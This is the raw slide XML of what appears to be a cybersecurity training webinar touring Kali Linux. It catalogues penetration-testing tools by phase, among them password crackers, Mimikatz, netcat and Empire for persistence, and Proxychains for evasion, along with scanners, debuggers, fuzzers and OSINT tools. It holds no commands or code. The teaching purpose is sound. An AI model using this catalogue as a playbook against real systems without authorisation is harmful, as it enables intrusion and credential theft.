            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>John the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ripper, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cain and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Abel, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Brute-forcing services: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (for database accounts), Medusa, Hydra, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cain and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Abel, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Patator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, W3AF, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-NG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Persistence: SET, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, SSH, NCAT, NETCAT, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Drozer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Powersploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Empire, </a:t>
            </a:r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smtClean="0"/>
              <a:t>Configuration compliance: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r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Evasion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, SET, </a:t>
            </a:r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err="1" smtClean="0"/>
              <a:t>Decompilation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Immunity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>debugger, APKX, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>APK studio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Forensics: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Immunity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>debugger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Debugging: OLLYDBG, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Immunity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>debugger, GDB, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WinDBG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, IDA </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Software assurance: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Findsecbugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SonarQube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, YASCA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Peach, AFL</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SAST	(Static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Testing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DAST	(Dynamic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Application Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Testing)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Kali Linux Tour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60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dem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>o was just a quick tour of the Kali</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Linux Application menus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One trick/tip:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you click a menu with an arrowhead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It will show submenus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300" y="1063229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4546" y="3489040"/>
            <a:ext cx="2857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Scanners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scanner found at: https://github.com/sullo/nikto</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenVAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Open Vulnerability Assessment System)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability scanner and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>manger found at: http://www.openvas.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SQLmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (Structured Query Language)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detects and exploits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>flaws</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, found at: http://sqlmap.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Commercial vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scanner found at: https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www.tenable.com/products/nessus/nessus-professional</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free for personal / non-professional use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C5F5B8A-E10E-4F71-B4F4-4670220CB6B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260624" y="2004179"/>
            <a:ext cx="6672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Chat with the audience and instructor by clicking the Group Chat icon          and enter you questions or comments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Have a question? Click the Q&amp;A icon         and enter your questions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print your Certification of Attendance using the certification widget     ,  after attending at least 110 minutes of the session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Do you have an idea or resource? We are trying the Idea widget out. Share resources you are using by typing in the Idea widget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media player will show video, and when the instructor shares the screen, will show shared content.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="342892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Control of Your Console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B8A7EE-2385-4AFA-8DB0-1650E2BAD9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260622" y="1195676"/>
            <a:ext cx="66724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the controls             to minimize or maximize a widget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Drag the bottom right hand corner to resize it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Click the icon          to download resources &amp; bookmark helpful links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183EF-6073-422C-8C76-F72AABDCB6D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="260624" y="968691"/>
            <a:ext cx="2032929" cy="248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892">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1013" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Widgets are resizable and movable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12E6C8-8AAD-4601-B73D-976417DF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4" y="1242813"/>
            <a:ext cx="516518" cy="271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E568B4-B5DA-4B4D-A22F-BA54A866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65" y="1488428"/>
            <a:ext cx="606818" cy="318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5B2664D-4063-488F-8FE0-2263C362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418" y="1753003"/>
            <a:ext cx="325502" cy="318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13E31AA-A632-4F13-9D93-36236577E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69" y="2315789"/>
            <a:ext cx="332185" cy="31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7DE16-24CF-4C19-BAA5-347A6F46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684" y="2551737"/>
            <a:ext cx="335803" cy="35009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D94C0E1-285A-4651-9349-FB7229E3B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03" y="3137852"/>
            <a:ext cx="328934" cy="328934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E96229A7-8DBA-498D-8B09-B0F509A6A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974" y="3630960"/>
            <a:ext cx="30938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1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1783"/>
            <a:ext cx="8229600" cy="3394472"/>
          </a:xfrm>
        </p:spPr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Credential testing tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Offline)	https://hashcat.net/hashcat/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Medusa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Online)	http://foofus.net/goons/jmk/medusa/medusa.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hydra			(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Online)	http://sectools.org/tool/hydra/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Cewl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Word	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> List Generator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	https://digi.ninja/projects/cewl.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>John </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ripper	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Offline)	http://www.openwall.com/john/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and Abel		(Both)	http://www.oxid.it/cain.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 		(Both)	https://github.com/gentilkiwi/mimikatz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Patator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Online) 	https://github.com/lanjelot/patator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>W3AF (Online, web app only)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	http://w3af.org/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Debuggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OLLYDBG			http://www.ollydbg.de/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Immunity debugger		https://www.immunityinc.com/products/debugger/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>GDB				https://www.gnu.org/software/gdb/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WinDBG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/debugger-download-tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IDA			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://www.hex-rays.com/products/ida/debugger/index.shtml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Software assurance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Findbugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>findsecbugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	(Java apps)		https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://find-sec-bugs.github.io/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Peach		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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Fuzzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://www.peach.tech/products/peach-fuzzer/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>AFL (American Fuzzy Lop) (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fuzzer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)		http://lcamtuf.coredump.cx/afl/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SonarQube</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		(Many languages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)	https://www.sonarqube.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>YASCA (Yet Another Source Code Analyzer) https://github.com/scovetta/yasca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OSINT (Open-source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>intelligence)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Domain info)	https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>whois.icann.org/en, command line, Registrars.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	(DNS info)		Found on most platform or use host and dig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Foca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Metadata)	https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>www.elevenpaths.com/labstools/foca/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Theharvester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(Variety)		 https://github.com/laramies/theHarvester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shodan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Net devices)	 https://www.shodan.io/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Data mining)	https://www.paterva.com/web7/buy/maltego-clients/maltego-ce.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Recon-NG	(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web info)		https://bitbucket.org/LaNMaSteR53/recon-ng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Censys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Net devices)	https://censys.io/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Wireless</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-NG</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Monitoring, Attacking, Testing, and Cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.aircrack-ng.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Kismet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Detector, sniffer, and IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://www.kismetwireless.net/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WiFite</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Python script for auditing wireless networks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Replaced by WiFite2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>https://github.com/derv82/wifite2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Web proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP ZAP (Zed Attack Proxy)</a:t>
            </a:r>
          </a:p>
          <a:p>
